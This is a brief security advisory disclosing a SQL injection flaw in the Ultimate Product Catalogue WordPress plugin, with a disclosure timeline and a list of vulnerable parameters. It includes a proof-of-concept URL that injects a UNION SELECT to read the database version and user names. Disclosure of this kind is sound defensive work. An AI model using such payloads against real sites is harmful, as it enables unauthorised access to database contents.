Plugin Details
Plugin Name: wp-plugin : ultimate-product-catalogue
Effected Version : (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number :
Identified by : Anantshri
Disclosure Timeline
-
December 28, 2013: Vendor Contacted
- May 28, 2014 : Public Disclosure
Technical Details
http://localhost/wp-admin/admin.php?page=UPCP-options&Action=Catalogue_Details&Selected=Catalogue&Catalogue_ID=2%20union%20select%20@@version,user(),system_user(),database(),5,6,7
Vulnerable Parameters : Catalogue_ID,SubCategory_ID,SingleProduct,Tag_ID
Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=830454%40ultimate-product-catalogue&old=821581%40ultimate-product-catalogue&sfp_email=&sfph_mail=#file2